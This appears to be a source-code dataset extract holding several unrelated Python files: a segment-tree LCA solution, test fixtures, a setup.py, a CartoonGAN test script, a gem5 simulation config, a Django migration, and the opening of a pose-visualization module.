hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a84ca1ff74d6ac1f9694eabe007799d5010cba3 | 3,728 | py | Python | src/data/1220.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/1220.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/1220.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | #!/usr/bin python3
# -*- coding: utf-8 -*-
class Tree():
def __init__(self, n):
self.n = n
self.edges = [[] for _ in range(n)]
self.root = None # 根
self.etnodes = [] # i番目の頂点番号
self.etedges = [] # i番目の辺の番号
self.etL = [0] * n # in
self.etR = [0] * n # out
self.depthbynodes = [0] * n
self.etdepth = [] # i番目の辺の
def add_edge(self, u, v):
self.edges[u].append(v)
self.edges[v].append(u)
def set_euler_tour(self, root):
self.root = root # 根を設定して
pa = [0] * self.n
stack = [~root, root]
ct = -1
de = -1
while stack:
v = stack.pop()
ct += 1
self.etedges.append(v)
if v >= 0:
de += 1
self.etnodes.append(v)
self.etdepth.append(de)
self.etL[v] = ct
self.depthbynodes[v] = de
p = pa[v]
for w in self.edges[v][::-1]:
if w == p: continue
pa[w] = v
stack.append(~w)
stack.append(w)
else:
de -= 1
if de < 0:
self.etdepth.append(self.n)
else:
self.etdepth.append(de)
self.etnodes.append(pa[~v])
self.etR[~v] = ct
#############################################
class SegmentTree:
# 初期化処理
# f : SegmentTreeにのせるモノイド
# idele : fに対する単位元
def __init__(self, size, f=lambda x, y: min(x, y), idele=float('inf')):
self.size = 2**(size - 1).bit_length() # 簡単のため要素数nを2冪にする
self.idele = idele # 単位元
self.f = f # モノイド
self.dat = [(self.idele, -1)] * (self.size * 2) # 要素を単位元で初期化
## one point
def update(self, i, x):
i += self.size # 1番下の層におけるインデックス
self.dat[i] = (x, i)
while i > 0: # 層をのぼりながら値を更新 indexが0になれば終了
i >>= 1 # 1つ上の層のインデックス(完全二分木における親)
# 下の層2つの演算結果の代入(完全二分木における子同士の演算)
self.dat[i] = self.f(self.dat[i * 2], self.dat[i * 2 + 1])
## range
def query(self, l, r):
l += self.size # 1番下の層におけるインデックス
r += self.size # 1番下の層におけるインデックス
lres, rres = (self.idele, -1), (self.idele, -1) # 左側の答えと右側の答えを初期化
while l < r: # lとrが重なるまで上記の判定を用いて演算を実行
# 左が子同士の右側(lが奇数)(lの末桁=1)ならば、dat[l]を加算
if l & 1:
lres = self.f(lres, self.dat[l])
l += 1
# 右が子同士の右側(rが奇数)(rの末桁=1)ならば、dat[r-1]を加算
if r & 1:
r -= 1
rres = self.f(self.dat[r],
rres) # モノイドでは可換律は保証されていないので演算の方向に注意
l >>= 1
r >>= 1
res = self.f(lres, rres)
return res
def init(self, a):
for i, x in enumerate(a):
# 1番下の層におけるインデックス
self.dat[i + self.size] = (x, i)
for i in range(self.size - 1, -1, -1):
self.dat[i] = self.f(self.dat[i * 2], self.dat[i * 2 + 1])
############################################
n, q = map(int, input().split())
T = Tree(n)
for _ in range(n - 1):
a, b = map(int, input().split())
T.add_edge(a - 1, b - 1)
T.set_euler_tour(0)
depth = T.etdepth
SGT = SegmentTree(len(depth))
SGT.init(depth)
for i in range(q):
a, b = map(int, input().split())
a -= 1
b -= 1
l = T.etL[a]
r = T.etL[b]
if l > r:
l, r = r, l
r += 1
x = SGT.query(l, r)[1]
lca = T.etnodes[x]
d = T.depthbynodes[a] + T.depthbynodes[b] - 2 * T.depthbynodes[lca]
if d % 2 == 0:
print('Town')
else:
print('Road')
| 28.242424 | 75 | 0.441792 |
3f37e86b6e246dcfd4af33dc291c99d749027858 | 705 | py | Python | plenum/test/node_request/test_pre_prepare/test_num_of_pre_prepare_with_one_fault.py | steptan/indy-plenum | 488bf63c82753a74a92ac6952da784825ffd4a3d | [
"Apache-2.0"
] | null | null | null | plenum/test/node_request/test_pre_prepare/test_num_of_pre_prepare_with_one_fault.py | steptan/indy-plenum | 488bf63c82753a74a92ac6952da784825ffd4a3d | [
"Apache-2.0"
] | null | null | null | plenum/test/node_request/test_pre_prepare/test_num_of_pre_prepare_with_one_fault.py | steptan/indy-plenum | 488bf63c82753a74a92ac6952da784825ffd4a3d | [
"Apache-2.0"
] | 2 | 2017-12-13T21:14:54.000Z | 2021-06-06T15:48:03.000Z | from functools import partial
import pytest
from stp_core.common.util import adict
from plenum.test.malicious_behaviors_node import makeNodeFaulty, \
delaysPrePrepareProcessing
nodeCount = 4
faultyNodes = 1
whitelist = ['cannot process incoming PREPARE']
@pytest.fixture(scope="module")
def setup(txnPoolNodeSet):
A = txnPoolNodeSet[-1]
makeNodeFaulty(A,
partial(delaysPrePrepareProcessing, delay=60))
# A.delaySelfNomination(10)
return adict(faulties=A)
@pytest.fixture(scope="module")
def afterElection(setup):
for r in setup.faulties.replicas:
assert not r.isPrimary
def testNumOfPrePrepareWithOneFault(afterElection, preprepared1):
pass
| 22.741935 | 66 | 0.747518 |
9663633d8e9dc1620e4de66cde0433a0b68a5cd5 | 1,261 | py | Python | Basic_Python_Programs/lab 3.py | Techme2911/HacktoberFest19-Algo | 1ca4007cc014b9d9131be92f362f4d2f846cdbc4 | [
"MIT"
] | 86 | 2015-06-13T16:53:55.000Z | 2022-03-24T20:56:42.000Z | Basic_Python_Programs/lab 3.py | Techme2911/HacktoberFest19-Algo | 1ca4007cc014b9d9131be92f362f4d2f846cdbc4 | [
"MIT"
] | 9 | 2015-05-27T07:52:44.000Z | 2022-03-29T21:52:40.000Z | Basic_Python_Programs/lab 3.py | Techme2911/HacktoberFest19-Algo | 1ca4007cc014b9d9131be92f362f4d2f846cdbc4 | [
"MIT"
] | 124 | 2015-12-10T01:17:18.000Z | 2021-11-08T04:03:38.000Z | # 1. WAP to create and merge two list and then sort it wihtout function sort
# 2. WAP to create list of number and sort even numbers using LIST COMPREHENSION
# 3. WAP to calculate number of uppercase and lowercase from input string.
l1=[]
l2=[]
a=int(input("Enter number of elements you want to enter in list 1: "))
b=int(input("Enter number of elements you want to enter in list 2: "))
for i in range(a):
x=int(input("Enter List Element: "))
l1.append(x)
for i in range(b):
x=int(input("Enter List Element: "))
l2.append(x)
l1.extend(l2)
m=[]
for i in range (len(l1)):
m.append(min(l1))
l1.remove(min(l1))
m.extend(l1)
print(m,end=" ")
print("is your sorted list")
#P2
l=[]
a=int(input("Number of elements in the list: "))
for i in range(a):
x=int(input("Enter List Element: "))
l.append(x)
lee=[i for i in l if i%2==0]
print("List of your even numbers is={evenlist}".format(evenlist=lee))
#P3
s=input("Enter any word string: ")
cu=0
cl=0
for i in s:
if i.isupper():
cu=cu+1
else:
cl=cl+1
print("Number of lower case:",cl)
print("Number of upper case:",cu)
| 21.741379 | 81 | 0.581285 |
b59ca589ddd8a93913244f35064d7b2cb72c65e1 | 847 | py | Python | setup.py | Erotemic/performer-pytorch | 968d3340a6a6d0cfd5bc208974bec85aa270e071 | [
"MIT"
] | 829 | 2020-10-03T15:38:41.000Z | 2022-03-28T15:22:16.000Z | setup.py | Erotemic/performer-pytorch | 968d3340a6a6d0cfd5bc208974bec85aa270e071 | [
"MIT"
] | 77 | 2020-10-05T18:55:14.000Z | 2022-03-28T00:16:29.000Z | setup.py | Erotemic/performer-pytorch | 968d3340a6a6d0cfd5bc208974bec85aa270e071 | [
"MIT"
] | 125 | 2020-10-11T11:11:18.000Z | 2022-03-29T11:14:24.000Z | from setuptools import setup, find_packages
setup(
name = 'performer-pytorch',
packages = find_packages(exclude=['examples']),
version = '1.1.0',
license='MIT',
description = 'Performer - Pytorch',
author = 'Phil Wang',
author_email = 'lucidrains@gmail.com',
url = 'https://github.com/lucidrains/performer-pytorch',
keywords = [
'artificial intelligence',
'attention mechanism',
'efficient attention',
'transformers'
],
install_requires=[
'einops>=0.3',
'local-attention>=1.1.1',
'torch>=1.6',
'axial-positional-embedding>=0.1.0'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
],
)
| 26.46875 | 65 | 0.646989 |
40f9db98c9d8059a7452f93c8f695a22564f9018 | 2,558 | py | Python | test.py | manestay/CartoonGAN-4731 | f8580a7f027d6505ce0e5c15314e2b53fe18b69e | [
"MIT"
] | 4 | 2019-01-23T16:00:06.000Z | 2020-05-06T12:45:00.000Z | test.py | manestay/CartoonGAN-4731 | f8580a7f027d6505ce0e5c15314e2b53fe18b69e | [
"MIT"
] | null | null | null | test.py | manestay/CartoonGAN-4731 | f8580a7f027d6505ce0e5c15314e2b53fe18b69e | [
"MIT"
] | 1 | 2019-12-03T13:16:15.000Z | 2019-12-03T13:16:15.000Z | import os, time, pickle, argparse, networks, utils
import torch
import torch.nn as nn
import torch.optim as optim
import matplotlib.pyplot as plt
from torchvision import transforms
parser = argparse.ArgumentParser()
parser.add_argument('--name', required=False, default='project_name', help='')
parser.add_argument('--in_ngc', type=int, default=3, help='input channel for generator')
parser.add_argument('--out_ngc', type=int, default=3, help='output channel for generator')
parser.add_argument('--batch_size', type=int, default=8, help='batch size')
parser.add_argument('--ngf', type=int, default=64)
parser.add_argument('--nb', type=int, default=8, help='the number of resnet block layer for generator')
parser.add_argument('--input_size_h', type=int, default=180, help='input size height')
parser.add_argument('--input_size_w', type=int, default=320, help='input size width')
parser.add_argument('--pre_trained_model', required=True, default='pre_trained_model', help='pre_trained cartoongan model path')
parser.add_argument('--image_dir', required=True, default='image_dir', help='test image path')
parser.add_argument('--output_image_dir', required=True, default='output_image_dir', help='output test image path')
args = parser.parse_args()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
if torch.backends.cudnn.enabled:
torch.backends.cudnn.benchmark = True
G = networks.generator(args.in_ngc, args.out_ngc, args.ngf, args.nb)
if torch.cuda.is_available():
G.load_state_dict(torch.load(args.pre_trained_model))
else:
# cpu mode
G.load_state_dict(torch.load(args.pre_trained_model, map_location=lambda storage, loc: storage))
G.to(device)
src_transform = transforms.Compose([
transforms.Resize((args.input_size_h, args.input_size_w)),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))
])
# utils.data_load(os.path.join('data', args.src_data), 'test', src_transform, 1, shuffle=True, drop_last=True)
image_src = utils.data_load(os.path.join(args.image_dir), 'test', src_transform, 1, shuffle=False, drop_last=True)
os.makedirs(args.output_image_dir, exist_ok=True)
with torch.no_grad():
G.eval()
num_digits = len(str(len(image_src)))
for n, (x, _) in enumerate(image_src):
x = x.to(device)
G_recon = G(x)
result = torch.cat((x[0], G_recon[0]), 2)
path = os.path.join(args.output_image_dir, str(n + 1).zfill(num_digits) + '.png')
plt.imsave(path, (result.cpu().numpy().transpose(1, 2, 0) + 1) / 2)
| 50.156863 | 128 | 0.725567 |
0f87e2b3acb3ca950e04a77204cb3e0314b81867 | 16,483 | py | Python | configs/example/fs.py | MRGuenther/DynamicPrefetch | 02627350c08868ad3988fe89fc004f0bac1a4c14 | [
"BSD-3-Clause"
] | 1 | 2020-11-24T14:39:55.000Z | 2020-11-24T14:39:55.000Z | configs/example/fs.py | MRGuenther/DynamicPrefetch | 02627350c08868ad3988fe89fc004f0bac1a4c14 | [
"BSD-3-Clause"
] | null | null | null | configs/example/fs.py | MRGuenther/DynamicPrefetch | 02627350c08868ad3988fe89fc004f0bac1a4c14 | [
"BSD-3-Clause"
] | 1 | 2021-12-08T10:19:20.000Z | 2021-12-08T10:19:20.000Z | # Copyright (c) 2010-2013, 2016 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2012-2014 Mark D. Hill and David A. Wood
# Copyright (c) 2009-2011 Advanced Micro Devices, Inc.
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
# Brad Beckmann
from __future__ import print_function
import optparse
import sys
import m5
from m5.defines import buildEnv
from m5.objects import *
from m5.util import addToPath, fatal, warn
from m5.util.fdthelper import *
addToPath('../')
from ruby import Ruby
from common.FSConfig import *
from common.SysPaths import *
from common.Benchmarks import *
from common import Simulation
from common import CacheConfig
from common import MemConfig
from common import CpuConfig
from common.Caches import *
from common import Options
# Check if KVM support has been enabled, we might need to do VM
# configuration if that's the case.
have_kvm_support = 'BaseKvmCPU' in globals()
def is_kvm_cpu(cpu_class):
return have_kvm_support and cpu_class != None and \
issubclass(cpu_class, BaseKvmCPU)
def cmd_line_template():
if options.command_line and options.command_line_file:
print("Error: --command-line and --command-line-file are "
"mutually exclusive")
sys.exit(1)
if options.command_line:
return options.command_line
if options.command_line_file:
return open(options.command_line_file).read().strip()
return None
def build_test_system(np):
cmdline = cmd_line_template()
if buildEnv['TARGET_ISA'] == "alpha":
test_sys = makeLinuxAlphaSystem(test_mem_mode, bm[0], options.ruby,
cmdline=cmdline)
elif buildEnv['TARGET_ISA'] == "mips":
test_sys = makeLinuxMipsSystem(test_mem_mode, bm[0], cmdline=cmdline)
elif buildEnv['TARGET_ISA'] == "sparc":
test_sys = makeSparcSystem(test_mem_mode, bm[0], cmdline=cmdline)
elif buildEnv['TARGET_ISA'] == "x86":
test_sys = makeLinuxX86System(test_mem_mode, options.num_cpus, bm[0],
options.ruby, cmdline=cmdline)
elif buildEnv['TARGET_ISA'] == "arm":
test_sys = makeArmSystem(test_mem_mode, options.machine_type,
options.num_cpus, bm[0], options.dtb_filename,
bare_metal=options.bare_metal,
cmdline=cmdline,
ignore_dtb=options.generate_dtb,
external_memory=
options.external_memory_system,
ruby=options.ruby,
security=options.enable_security_extensions)
if options.enable_context_switch_stats_dump:
test_sys.enable_context_switch_stats_dump = True
else:
fatal("Incapable of building %s full system!", buildEnv['TARGET_ISA'])
# Set the cache line size for the entire system
test_sys.cache_line_size = options.cacheline_size
# Create a top-level voltage domain
test_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage)
# Create a source clock for the system and set the clock period
test_sys.clk_domain = SrcClockDomain(clock = options.sys_clock,
voltage_domain = test_sys.voltage_domain)
# Create a CPU voltage domain
test_sys.cpu_voltage_domain = VoltageDomain()
# Create a source clock for the CPUs and set the clock period
test_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
voltage_domain =
test_sys.cpu_voltage_domain)
if options.kernel is not None:
test_sys.kernel = binary(options.kernel)
if options.script is not None:
test_sys.readfile = options.script
if options.lpae:
test_sys.have_lpae = True
if options.virtualisation:
test_sys.have_virtualization = True
test_sys.init_param = options.init_param
# For now, assign all the CPUs to the same clock domain
test_sys.cpu = [TestCPUClass(clk_domain=test_sys.cpu_clk_domain, cpu_id=i)
for i in xrange(np)]
if is_kvm_cpu(TestCPUClass) or is_kvm_cpu(FutureClass):
test_sys.kvm_vm = KvmVM()
if options.ruby:
Ruby.create_system(options, True, test_sys, test_sys.iobus,
test_sys._dma_ports)
# Create a seperate clock domain for Ruby
test_sys.ruby.clk_domain = SrcClockDomain(clock = options.ruby_clock,
voltage_domain = test_sys.voltage_domain)
# Connect the ruby io port to the PIO bus,
# assuming that there is just one such port.
test_sys.iobus.master = test_sys.ruby._io_port.slave
for (i, cpu) in enumerate(test_sys.cpu):
#
# Tie the cpu ports to the correct ruby system ports
#
cpu.clk_domain = test_sys.cpu_clk_domain
cpu.createThreads()
cpu.createInterruptController()
cpu.icache_port = test_sys.ruby._cpu_ports[i].slave
cpu.dcache_port = test_sys.ruby._cpu_ports[i].slave
if buildEnv['TARGET_ISA'] in ("x86", "arm"):
cpu.itb.walker.port = test_sys.ruby._cpu_ports[i].slave
cpu.dtb.walker.port = test_sys.ruby._cpu_ports[i].slave
if buildEnv['TARGET_ISA'] in "x86":
cpu.interrupts[0].pio = test_sys.ruby._cpu_ports[i].master
cpu.interrupts[0].int_master = test_sys.ruby._cpu_ports[i].slave
cpu.interrupts[0].int_slave = test_sys.ruby._cpu_ports[i].master
else:
if options.caches or options.l2cache:
# By default the IOCache runs at the system clock
test_sys.iocache = IOCache(addr_ranges = test_sys.mem_ranges)
test_sys.iocache.cpu_side = test_sys.iobus.master
test_sys.iocache.mem_side = test_sys.membus.slave
elif not options.external_memory_system:
test_sys.iobridge = Bridge(delay='50ns', ranges = test_sys.mem_ranges)
test_sys.iobridge.slave = test_sys.iobus.master
test_sys.iobridge.master = test_sys.membus.slave
# Sanity check
if options.fastmem:
if TestCPUClass != AtomicSimpleCPU:
fatal("Fastmem can only be used with atomic CPU!")
if (options.caches or options.l2cache):
fatal("You cannot use fastmem in combination with caches!")
if options.simpoint_profile:
if not options.fastmem:
# Atomic CPU checked with fastmem option already
fatal("SimPoint generation should be done with atomic cpu and fastmem")
if np > 1:
fatal("SimPoint generation not supported with more than one CPUs")
for i in xrange(np):
if options.fastmem:
test_sys.cpu[i].fastmem = True
if options.simpoint_profile:
test_sys.cpu[i].addSimPointProbe(options.simpoint_interval)
if options.checker:
test_sys.cpu[i].addCheckerCpu()
test_sys.cpu[i].createThreads()
# If elastic tracing is enabled when not restoring from checkpoint and
# when not fast forwarding using the atomic cpu, then check that the
# TestCPUClass is DerivO3CPU or inherits from DerivO3CPU. If the check
# passes then attach the elastic trace probe.
# If restoring from checkpoint or fast forwarding, the code that does this for
# FutureCPUClass is in the Simulation module. If the check passes then the
# elastic trace probe is attached to the switch CPUs.
if options.elastic_trace_en and options.checkpoint_restore == None and \
not options.fast_forward:
CpuConfig.config_etrace(TestCPUClass, test_sys.cpu, options)
CacheConfig.config_cache(options, test_sys)
MemConfig.config_mem(options, test_sys)
return test_sys
def build_drive_system(np):
# driver system CPU is always simple, so is the memory
# Note this is an assignment of a class, not an instance.
DriveCPUClass = AtomicSimpleCPU
drive_mem_mode = 'atomic'
DriveMemClass = SimpleMemory
cmdline = cmd_line_template()
if buildEnv['TARGET_ISA'] == 'alpha':
drive_sys = makeLinuxAlphaSystem(drive_mem_mode, bm[1], cmdline=cmdline)
elif buildEnv['TARGET_ISA'] == 'mips':
drive_sys = makeLinuxMipsSystem(drive_mem_mode, bm[1], cmdline=cmdline)
elif buildEnv['TARGET_ISA'] == 'sparc':
drive_sys = makeSparcSystem(drive_mem_mode, bm[1], cmdline=cmdline)
elif buildEnv['TARGET_ISA'] == 'x86':
drive_sys = makeLinuxX86System(drive_mem_mode, np, bm[1],
cmdline=cmdline)
elif buildEnv['TARGET_ISA'] == 'arm':
drive_sys = makeArmSystem(drive_mem_mode, options.machine_type, np,
bm[1], options.dtb_filename, cmdline=cmdline,
ignore_dtb=options.generate_dtb)
# Create a top-level voltage domain
drive_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage)
# Create a source clock for the system and set the clock period
drive_sys.clk_domain = SrcClockDomain(clock = options.sys_clock,
voltage_domain = drive_sys.voltage_domain)
# Create a CPU voltage domain
drive_sys.cpu_voltage_domain = VoltageDomain()
# Create a source clock for the CPUs and set the clock period
drive_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
voltage_domain =
drive_sys.cpu_voltage_domain)
drive_sys.cpu = DriveCPUClass(clk_domain=drive_sys.cpu_clk_domain,
cpu_id=0)
drive_sys.cpu.createThreads()
drive_sys.cpu.createInterruptController()
drive_sys.cpu.connectAllPorts(drive_sys.membus)
if options.fastmem:
drive_sys.cpu.fastmem = True
if options.kernel is not None:
drive_sys.kernel = binary(options.kernel)
if is_kvm_cpu(DriveCPUClass):
drive_sys.kvm_vm = KvmVM()
drive_sys.iobridge = Bridge(delay='50ns',
ranges = drive_sys.mem_ranges)
drive_sys.iobridge.slave = drive_sys.iobus.master
drive_sys.iobridge.master = drive_sys.membus.slave
# Create the appropriate memory controllers and connect them to the
# memory bus
drive_sys.mem_ctrls = [DriveMemClass(range = r)
for r in drive_sys.mem_ranges]
for i in xrange(len(drive_sys.mem_ctrls)):
drive_sys.mem_ctrls[i].port = drive_sys.membus.master
drive_sys.init_param = options.init_param
return drive_sys
# Add options
parser = optparse.OptionParser()
Options.addCommonOptions(parser)
Options.addFSOptions(parser)
# Add the ruby specific and protocol specific options
if '--ruby' in sys.argv:
Ruby.define_options(parser)
(options, args) = parser.parse_args()
if args:
print("Error: script doesn't take any positional arguments")
sys.exit(1)
# system under test can be any CPU
(TestCPUClass, test_mem_mode, FutureClass) = Simulation.setCPUClass(options)
# Match the memories with the CPUs, based on the options for the test system
TestMemClass = Simulation.setMemClass(options)
if options.benchmark:
try:
bm = Benchmarks[options.benchmark]
except KeyError:
print("Error benchmark %s has not been defined." % options.benchmark)
print("Valid benchmarks are: %s" % DefinedBenchmarks)
sys.exit(1)
else:
if options.dual:
bm = [SysConfig(disk=options.disk_image, rootdev=options.root_device,
mem=options.mem_size, os_type=options.os_type),
SysConfig(disk=options.disk_image, rootdev=options.root_device,
mem=options.mem_size, os_type=options.os_type)]
else:
bm = [SysConfig(disk=options.disk_image, rootdev=options.root_device,
mem=options.mem_size, os_type=options.os_type)]
np = options.num_cpus
test_sys = build_test_system(np)
if len(bm) == 2:
drive_sys = build_drive_system(np)
root = makeDualRoot(True, test_sys, drive_sys, options.etherdump)
elif len(bm) == 1 and options.dist:
# This system is part of a dist-gem5 simulation
root = makeDistRoot(test_sys,
options.dist_rank,
options.dist_size,
options.dist_server_name,
options.dist_server_port,
options.dist_sync_repeat,
options.dist_sync_start,
options.ethernet_linkspeed,
options.ethernet_linkdelay,
options.etherdump);
elif len(bm) == 1:
root = Root(full_system=True, system=test_sys)
else:
print("Error I don't know how to create more than 2 systems.")
sys.exit(1)
if options.timesync:
root.time_sync_enable = True
if options.frame_capture:
VncServer.frame_capture = True
if buildEnv['TARGET_ISA'] == "arm" and options.generate_dtb:
# Sanity checks
if options.dtb_filename:
fatal("--generate-dtb and --dtb-filename cannot be specified at the"\
"same time.")
if options.machine_type not in ["VExpress_GEM5", "VExpress_GEM5_V1"]:
warn("Can only correctly generate a dtb for VExpress_GEM5_V1 " \
"platforms, unless custom hardware models have been equipped "\
"with generation functionality.")
# Generate a Device Tree
def create_dtb_for_system(system, filename):
state = FdtState(addr_cells=2, size_cells=2, cpu_cells=1)
rootNode = system.generateDeviceTree(state)
fdt = Fdt()
fdt.add_rootnode(rootNode)
dtb_filename = os.path.join(m5.options.outdir, filename)
return fdt.writeDtbFile(dtb_filename)
for sysname in ('system', 'testsys', 'drivesys'):
if hasattr(root, sysname):
sys = getattr(root, sysname)
sys.dtb_filename = create_dtb_for_system(sys, '%s.dtb' % sysname)
Simulation.setWorkCountOptions(test_sys, options)
Simulation.run(options, root, test_sys, FutureClass)
| 41.310777 | 87 | 0.668022 |
433574e3ad7cb394257ec617aa8d7eddc16c97a1 | 411 | py | Python | examples/how_to/get_version_info_from_last_good_build.py | tuenti/jenkinsapi | 52548695da01bd431a6f9fc3c46f7ff42922af39 | [
"MIT"
] | null | null | null | examples/how_to/get_version_info_from_last_good_build.py | tuenti/jenkinsapi | 52548695da01bd431a6f9fc3c46f7ff42922af39 | [
"MIT"
] | null | null | null | examples/how_to/get_version_info_from_last_good_build.py | tuenti/jenkinsapi | 52548695da01bd431a6f9fc3c46f7ff42922af39 | [
"MIT"
] | 1 | 2019-12-08T16:20:22.000Z | 2019-12-08T16:20:22.000Z | """
Extract version information from the latest build.
"""
from jenkinsapi.jenkins import Jenkins
def getSCMInfroFromLatestGoodBuild(url, jobName, username=None, password=None):
J = Jenkins(url, username, password)
job = J[jobName]
lgb = job.get_last_good_build()
return lgb.get_revision()
if __name__ == '__main__':
print getSCMInfroFromLatestGoodBuild('http://localhost:8080', 'fooJob')
| 29.357143 | 79 | 0.739659 |
276c0039a116e6b116726f17dc5b6aa9fe574fdf | 610 | py | Python | djstripe/migrations/0012_account_djstripe_owner_account.py | TenantBase/dj-stripe | c3fe9da9dd0e15fd714c95402b7672aac07d43e1 | [
"MIT"
] | null | null | null | djstripe/migrations/0012_account_djstripe_owner_account.py | TenantBase/dj-stripe | c3fe9da9dd0e15fd714c95402b7672aac07d43e1 | [
"MIT"
] | null | null | null | djstripe/migrations/0012_account_djstripe_owner_account.py | TenantBase/dj-stripe | c3fe9da9dd0e15fd714c95402b7672aac07d43e1 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.11 on 2022-02-02 19:12
from django.conf import settings
from django.db import migrations
import django.db.models.deletion
import djstripe.fields
class Migration(migrations.Migration):
dependencies = [
('djstripe', '0011_2_7'),
]
operations = [
migrations.AddField(
model_name='account',
name='djstripe_owner_account',
field=djstripe.fields.StripeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='djstripe.account', to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD),
),
]
| 27.727273 | 191 | 0.693443 |
a953834e2af3abb629ef0d9898fa39dfdb3dfe9b | 8,187 | py | Python | vision/visualizer_human.py | yihui-he2020/epipolar-transformers | 6824f4345b2998500fbacd0f4e30f67f8e3da7b8 | [
"MIT"
] | 360 | 2020-03-30T07:15:45.000Z | 2022-03-04T14:08:04.000Z | vision/visualizer_human.py | yihui-he2020/epipolar-transformers | 6824f4345b2998500fbacd0f4e30f67f8e3da7b8 | [
"MIT"
] | 30 | 2020-05-12T11:12:20.000Z | 2021-12-31T05:49:10.000Z | vision/visualizer_human.py | yihui-he2020/epipolar-transformers | 6824f4345b2998500fbacd0f4e30f67f8e3da7b8 | [
"MIT"
] | 38 | 2020-05-12T05:33:46.000Z | 2022-01-25T22:27:45.000Z | import numpy as np
import scipy.ndimage
import skimage
import cv2
import torch
import matplotlib
from matplotlib import pylab as plt
# from mpl_toolkits.mplot3d import axes3d, Axes3D
# matplotlib.use('Agg')
CONNECTIVITY_DICT = {
'cmu': [(0, 2), (0, 9), (1, 0), (1, 17), (2, 12), (3, 0), (4, 3), (5, 4), (6, 2), (7, 6), (8, 7), (9, 10), (10, 11), (12, 13), (13, 14), (15, 1), (16, 15), (17, 18)],
'coco': [(0, 1), (0, 2), (1, 3), (2, 4), (5, 7), (7, 9), (6, 8), (8, 10), (11, 13), (13, 15), (12, 14), (14, 16), (5, 6), (5, 11), (6, 12), (11, 12)],
"mpii": [(0, 1), (1, 2), (2, 6), (5, 4), (4, 3), (3, 6), (6, 7), (7, 8), (8, 9), (8, 12), (8, 13), (10, 11), (11, 12), (13, 14), (14, 15)],
"human36m": [
(0, 1), (0, 4), #root hip
(1, 2), (4, 5), #hip knee
(2, 3), (5, 6), #knee ankle
(0, 7), #root belly
(7, 8), #belly neck
(8, 9), #neck nose
(9, 10), #nose head
(8, 11), (8, 14), #neck shoulder
(11, 12), (14, 15), #shoulder elbow
(12, 13), (15, 16), #elbow wrist
],
